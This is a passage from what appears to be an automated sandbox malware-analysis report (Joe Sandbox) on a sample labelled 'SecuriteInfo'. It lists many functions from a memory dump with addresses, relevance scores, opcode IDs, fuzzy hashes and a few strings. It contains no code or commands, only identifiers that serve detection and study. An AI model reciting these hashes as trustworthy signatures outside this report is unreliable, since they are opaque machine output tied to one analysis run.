                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 601a37022269870f87af852e54abc3e1a7ec46335de6367216231023e3f8f1df
                                                        • Instruction ID: 81626e12d415e7878faeb96ec7efa9bd8013fcf5263986e236e1f4f0b70c7f53
                                                        • Opcode Fuzzy Hash: 601a37022269870f87af852e54abc3e1a7ec46335de6367216231023e3f8f1df
                                                        • Instruction Fuzzy Hash: BF3170B25483099FC361DF68C984A5BBBECEB95754F000A2EF995C3251E634DE04CB93
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017F1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: WindowsExcludedProcs
                                                        • API String ID: 0-3583428290
                                                        • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                        • Instruction ID: ea7dcae6701d44dd05ae7e2fd2786a514639eee8d814b21868968e07d4b5904d
                                                        • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                        • Instruction Fuzzy Hash: BF21C27A60122DEBDB229A5D8840F6BFBADEF41B50F454469FB14DB300DA31DE00D7A1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01898DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Critical error detected %lx, xrefs: 01898E21
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Critical error detected %lx
                                                        • API String ID: 0-802127002
                                                        • Opcode ID: 52922b63e73dac43e30b167698849b333e61d5201bc34e1d9b083ed928230a73
                                                        • Instruction ID: 804354665e3d16a4500306aefc4bd0dfdf8f2cd9d84398ad86f2a005fc56f8c3
                                                        • Opcode Fuzzy Hash: 52922b63e73dac43e30b167698849b333e61d5201bc34e1d9b083ed928230a73
                                                        • Instruction Fuzzy Hash: 011175B5D00349DADF24CFA8851579CBBB0AB46315F28421EE169AB282C3344702CF55
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018B5BA5 Relevance: .6, Instructions: 592COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd0fbe12e77bd4ebd99aaf391a9f6c1623b08649ee7566f0b3291bacd2a73138
                                                        • Instruction ID: 7d949b02c82fa9d099ad8ef247a6aa552eb5877824327537b7521d06cca76bcd
                                                        • Opcode Fuzzy Hash: fd0fbe12e77bd4ebd99aaf391a9f6c1623b08649ee7566f0b3291bacd2a73138
                                                        • Instruction Fuzzy Hash: C5424D75901629CFDB24CF68C880BA9BBB1FF49304F1481AAD94DEB342E7749A85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01804120 Relevance: .4, Instructions: 444COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5910807af26e1b14bb9f0b26ba6074d0fd25aabb2e4faa4c3cb16250f9d55852
                                                        • Instruction ID: 945cb22f0f3f61c20285cbd812999b4c90900fb382e18233e91dd75426d84104
                                                        • Opcode Fuzzy Hash: 5910807af26e1b14bb9f0b26ba6074d0fd25aabb2e4faa4c3cb16250f9d55852
                                                        • Instruction Fuzzy Hash: 19F1A0706487198FC766CF19C880A3AB7E1FF88714F15492EF686C7291E734DA81CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018120A0 Relevance: .4, Instructions: 420COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c557f12e6e7a5765fd8bde53cee41b57e5da2a217eee710dfbde9a6396e20371
                                                        • Instruction ID: 0c9ff91a2d1b46ae1c826549c714caa9f888afe69bc4504431b0bced71fa5272
                                                        • Opcode Fuzzy Hash: c557f12e6e7a5765fd8bde53cee41b57e5da2a217eee710dfbde9a6396e20371
                                                        • Instruction Fuzzy Hash: 4DF106326083459FD726CF2CC840B6BBBEAEF85324F24851DE995CB295D734DA45CB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E6800 Relevance: .4, Instructions: 373COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dd68b5c365a10e78617a2a9c3355d8db4df47b2821a383d33008259bde542d36
                                                        • Instruction ID: bb9985e42fb9bc48450ebe75dedbf316ffa21cb20295975121f9e49dd2455cdd
                                                        • Opcode Fuzzy Hash: dd68b5c365a10e78617a2a9c3355d8db4df47b2821a383d33008259bde542d36
                                                        • Instruction Fuzzy Hash: 45D1D471A0020A9BCB14DF69C898ABEB7F5EF28714F14416DF916D7290EB34EA85CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018165A0 Relevance: .4, Instructions: 368COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dc63f89187350a07a4408f6d11ac0b92a332a3d442454cf7d9a418d9743a60d7
                                                        • Instruction ID: 1388c6094e74e92e28440bbb92e7804f39cd9c19d02d43ec225c9702b9b5f83b
                                                        • Opcode Fuzzy Hash: dc63f89187350a07a4408f6d11ac0b92a332a3d442454cf7d9a418d9743a60d7
                                                        • Instruction Fuzzy Hash: 60E1A376A00209CFDB58CF59C480BA9B7F6FF48310F648169E955EB395D734EA81CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017FD5E0 Relevance: .4, Instructions: 353COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c7b745e3b352a8760ea6879c320e7df5366c21b2ed2d9a010006ef48e505a4e1
                                                        • Instruction ID: 4a3feb175c95e9d5dcacee8dc580eccbfe2595efb113584cbc4ab5e36ce50b3c
                                                        • Opcode Fuzzy Hash: c7b745e3b352a8760ea6879c320e7df5366c21b2ed2d9a010006ef48e505a4e1
                                                        • Instruction Fuzzy Hash: 1FE1B131A0135A8FEB35CB69C894B6AF7B2BF45314F04019DDA099B391DB749A81CF52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E3ACA Relevance: .3, Instructions: 348COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 79a7d3756f70f78bec326a88bfc95e4d2bd04256413512df01e2c5c1905922ec
                                                        • Instruction ID: 13b2c7116e7322661bdc99ec597c745aa47c79b4696dc2f3cde5f2c8bf060b65
                                                        • Opcode Fuzzy Hash: 79a7d3756f70f78bec326a88bfc95e4d2bd04256413512df01e2c5c1905922ec
                                                        • Instruction Fuzzy Hash: 0AE1D071E01608DFCB26CFA9C988AADFBF1BF4C310F14456AE546A7661DB71A981CF10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180B236 Relevance: .3, Instructions: 305COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                        • Instruction ID: f3f1d1d670af22354fb489f6dbbc3f0a679c57381b407df5ec3eda4a10c74943
                                                        • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                        • Instruction Fuzzy Hash: 81B1AE35A00A0E9BDB56DBA9CC90B7EBBE6EF44304F154169EA52D7381DB30AB40CB51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017F849B Relevance: .3, Instructions: 290COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 13b134a0ae9af2b0928efb380bc06e54e66f17461f1fdc11685bf43f706d70e8
                                                        • Instruction ID: d4573c2fa97d735cec8f4617975f9ed939f4fc18b24f25c9aacc44d4d5e31839
                                                        • Opcode Fuzzy Hash: 13b134a0ae9af2b0928efb380bc06e54e66f17461f1fdc11685bf43f706d70e8
                                                        • Instruction Fuzzy Hash: 31B13971E00219DFDB25DFA9C984AAEFBB5BF48304F10412DE605EB346DB70AA45CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018137EB Relevance: .3, Instructions: 269COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6d06439de308b1c938e85b8942beed46b803ac18224bbc698cfc1b2375dc85fa
                                                        • Instruction ID: ac0e0d32ad127e89efdf158e4635d7dd5499cee33d1e7b457cc2eb5aedc36578
                                                        • Opcode Fuzzy Hash: 6d06439de308b1c938e85b8942beed46b803ac18224bbc698cfc1b2375dc85fa
                                                        • Instruction Fuzzy Hash: 0CB149B2900609DFCB15DF99C940AADBBF9FB48710F14412EE91AEB395E734AA01CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181513A Relevance: .3, Instructions: 258COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc60cbdf02cbeddfba6734990436af134b1af52c19dd6f3b0f24ced032411d19
                                                        • Instruction ID: ccf712884d93ac408a266433682c9e54a6f85538f969263aa3fdfaab469fa123
                                                        • Opcode Fuzzy Hash: fc60cbdf02cbeddfba6734990436af134b1af52c19dd6f3b0f24ced032411d19
                                                        • Instruction Fuzzy Hash: FCC130755093818FD355CF28C480A5AFBE1FF89304F684A6EF9998B352D731EA85CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018103E2 Relevance: .3, Instructions: 254COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 760997f03e3c13f5cdd28320319ae5d74f3d2c39afae3daf3f534cb12185a27a
                                                        • Instruction ID: e34660dd96a0c78d4a8b9cdd43444e5daa7913a816a861663e2b9bc193e4e859
                                                        • Opcode Fuzzy Hash: 760997f03e3c13f5cdd28320319ae5d74f3d2c39afae3daf3f534cb12185a27a
                                                        • Instruction Fuzzy Hash: DC91EB32E002599BEB329A6CCC84BAD7BA8EB05728F050265FD51E72D5E7749FC0C791
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181DA88 Relevance: .3, Instructions: 253COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a190709d642f8e793b91809e3bad9cde3df5e1bb5a833d1d0c52453a77707639
                                                        • Instruction ID: f1f0a1f7a887b91f0b0248bb29809361f93171c18dc949797705ed2de5dffdb2
                                                        • Opcode Fuzzy Hash: a190709d642f8e793b91809e3bad9cde3df5e1bb5a833d1d0c52453a77707639
                                                        • Instruction Fuzzy Hash: 05A19E76A01309CFDB25CF9CD4487A9BBB5BF18348F244659D812DB29AE371DA82CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E5AC0 Relevance: .2, Instructions: 222COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3b377d6f16d1ccb796ac59677cba3995715b98b631f8ac2cfbd0ab54d8cf38d7
                                                        • Instruction ID: 6fa462fc16ee500637957ec89801b6bdd58280257016f5bc22b4914ae42c75d4
                                                        • Opcode Fuzzy Hash: 3b377d6f16d1ccb796ac59677cba3995715b98b631f8ac2cfbd0ab54d8cf38d7
                                                        • Instruction Fuzzy Hash: 7381B7B5A0062D9BDF25CB1CCD44BEAB7F4AB44314F0441A9DA15E3281EB74EBC1CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0181138B Relevance: .2, Instructions: 206COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                        • Instruction ID: 272c861a77a220b884db5ec4bb825ecc6f7ded135564bf9be001be4cf3f66cd8
                                                        • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                                        • Instruction Fuzzy Hash: 3681AE75A007459FDB25CF68C484BAABBF9FF48304F14856AE946C7751D334EA41CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018097ED Relevance: .2, Instructions: 202COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b70c8bf6df693b2789b042ff565fefe926ab4bc65a1baa36186ed91002bc15e8
                                                        • Instruction ID: 21993ca55d20116478108aebe9f21e7f06e2d00d664fcff6f3b220144b677af5
                                                        • Opcode Fuzzy Hash: b70c8bf6df693b2789b042ff565fefe926ab4bc65a1baa36186ed91002bc15e8
                                                        • Instruction Fuzzy Hash: 84710F32A042568FD352DF28C884B2AF7E4FF84714F058569EC99CB392D734DA41CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0187B8D0 Relevance: .2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8ddb3c81b2f044c3ec7f4f049615dacd293d842514d6e2274d800cb5a00dbc6
                                                        • Instruction ID: ef5f6eff502b5b164f2669682544046c4cb548fcb8aefa339d05e6a7d58e1c11
                                                        • Opcode Fuzzy Hash: c8ddb3c81b2f044c3ec7f4f049615dacd293d842514d6e2274d800cb5a00dbc6
                                                        • Instruction Fuzzy Hash: 3171F032200706AFE732EF18CC44F66BBE6EF44724F144528E665D72A1EB71EA40CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01866DC9 Relevance: .2, Instructions: 199COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                        • Instruction ID: 08aadea4f27823ffd770dee422e8175c119ae13c98cb33b91f02e09956eab777
                                                        • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                        • Instruction Fuzzy Hash: 38717F71E00659EFDB11DFA8C984EEEBBB9FF48714F104069E505E7290EB34AA41CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017FF370 Relevance: .2, Instructions: 194COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eee43d28341189f3a8e067d164f00360e53864fb18aa0422d27b03f0af2ddf62
                                                        • Instruction ID: cb73985a7bade6452bf77bccdda4db7d2c90485578659bff1ee860db3693515d
                                                        • Opcode Fuzzy Hash: eee43d28341189f3a8e067d164f00360e53864fb18aa0422d27b03f0af2ddf62
                                                        • Instruction Fuzzy Hash: D261E036A052158BCB26CF5CC48067FBBB1EF85710B1880ADEA55DB385DF34DA42CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E395E Relevance: .2, Instructions: 172COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc7c2e867ad0a8b28e6b0373f3d63b0a935ae8c0982cc186f36449126e290372
                                                        • Instruction ID: 022eeb675c2f41b6afc0dbb55d10b1a4b12c15b24b7bc9a7778016e58e95c955
                                                        • Opcode Fuzzy Hash: fc7c2e867ad0a8b28e6b0373f3d63b0a935ae8c0982cc186f36449126e290372
                                                        • Instruction Fuzzy Hash: 39519F71A007069FDB31DF59C888A6BF7E9BF59309F00442DE24687651DB74EA84CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017EB171 Relevance: .2, Instructions: 166COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9922d02bdf8b7221ba9dbc3ea8eec8afdc7674d0a800f0334204b25bc76be91d
                                                        • Instruction ID: 2bd3068e35a56690fd166ea663c4b08b20ecaf2d5a854227d3d63c888c61beeb
                                                        • Opcode Fuzzy Hash: 9922d02bdf8b7221ba9dbc3ea8eec8afdc7674d0a800f0334204b25bc76be91d
                                                        • Instruction Fuzzy Hash: 8751D275D0025D8FEB31CF688845BAEBFB0BF04714F1041A9D859EB292DB744A41DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018195EC Relevance: .2, Instructions: 165COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 58ddb407461cc8f450d08b9fe79c7812ee263728b9d65bb9b2bf18c24495276c
                                                        • Instruction ID: 4287a3d25e553687b8c42b2aceb447e70c90f4fbea890e5149688ce17dceb047
                                                        • Opcode Fuzzy Hash: 58ddb407461cc8f450d08b9fe79c7812ee263728b9d65bb9b2bf18c24495276c
                                                        • Instruction Fuzzy Hash: F851CF72E0060ADFDB16DF68C8547AEBBB8FF54318F00452AD412D7294DB74AA14CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 018AB581 Relevance: .2, Instructions: 163COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da5863647adb7593146b4bead9aafbcdbae94dcb2f7f849481b1b5248a7bfd01
                                                        • Instruction ID: 7910e8d9a4802015358a2163472929b34177914134ba00d3a9119118c157755a
                                                        • Opcode Fuzzy Hash: da5863647adb7593146b4bead9aafbcdbae94dcb2f7f849481b1b5248a7bfd01
                                                        • Instruction Fuzzy Hash: 9751F5316047868BF315DF2CC594B6ABBE0FF50314F584569E985CB291EB74EA05CB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017E52A5 Relevance: .2, Instructions: 161COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a69cf8dceddd923727ab27d02a74b81fbc2092a9c86e4c760e8c5f6e5045be8
                                                        • Instruction ID: 3aa43c44bdf297a07fe5d5bee21ae9c9dca322149ed14dc332ebec751c663836
                                                        • Opcode Fuzzy Hash: 5a69cf8dceddd923727ab27d02a74b81fbc2092a9c86e4c760e8c5f6e5045be8
                                                        • Instruction Fuzzy Hash: EF51AD7120934AABD322DF28C844B27BBE8FF54718F14091EF595C7651EB74EA44CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01812AE4 Relevance: .2, Instructions: 159COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5e688a64eb12930a0ca5bc403b6d488face7e3f11e6d32af40162f7f9afd4aae
                                                        • Instruction ID: eefe7e38b0565bf17179647d52833cec4a20e8577b1122f9d79dc816baee755d
                                                        • Opcode Fuzzy Hash: 5e688a64eb12930a0ca5bc403b6d488face7e3f11e6d32af40162f7f9afd4aae
                                                        • Instruction Fuzzy Hash: 785190B7A00129CFCB18CF1CC4909BDB7B6FB88704725845AE846DB369E734AB51DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01813C3E Relevance: .2, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 363b33fbe704313a7ff304a4834fecbcfd4720c9213d8a3c5ecb4e333f1e5033
                                                        • Instruction ID: e5cac15940181757908f9eb0c5a96c6cdf982f3d51c4f27801b3756e1bdcda54
                                                        • Opcode Fuzzy Hash: 363b33fbe704313a7ff304a4834fecbcfd4720c9213d8a3c5ecb4e333f1e5033
                                                        • Instruction Fuzzy Hash: 72516D726083419FD741DF29C884A6ABBEDFF84364F144929FC99C7285E770EA05CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0180DBE9 Relevance: .1, Instructions: 149COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a91e428be89bbd34b628a66105a47fe688700d7c6aaa89a8a6c721cf50243345
                                                        • Instruction ID: 2c5c094d55bc763bf1014445bac3c9cc4672a303d794c4000cc4719fadf78bb6
                                                        • Opcode Fuzzy Hash: a91e428be89bbd34b628a66105a47fe688700d7c6aaa89a8a6c721cf50243345
                                                        • Instruction Fuzzy Hash: 37518175A01609DFCB56CFECC88069EFBF1BB49350F24825AD955E7384DB30AA44CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 017FEF40 Relevance: .1, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
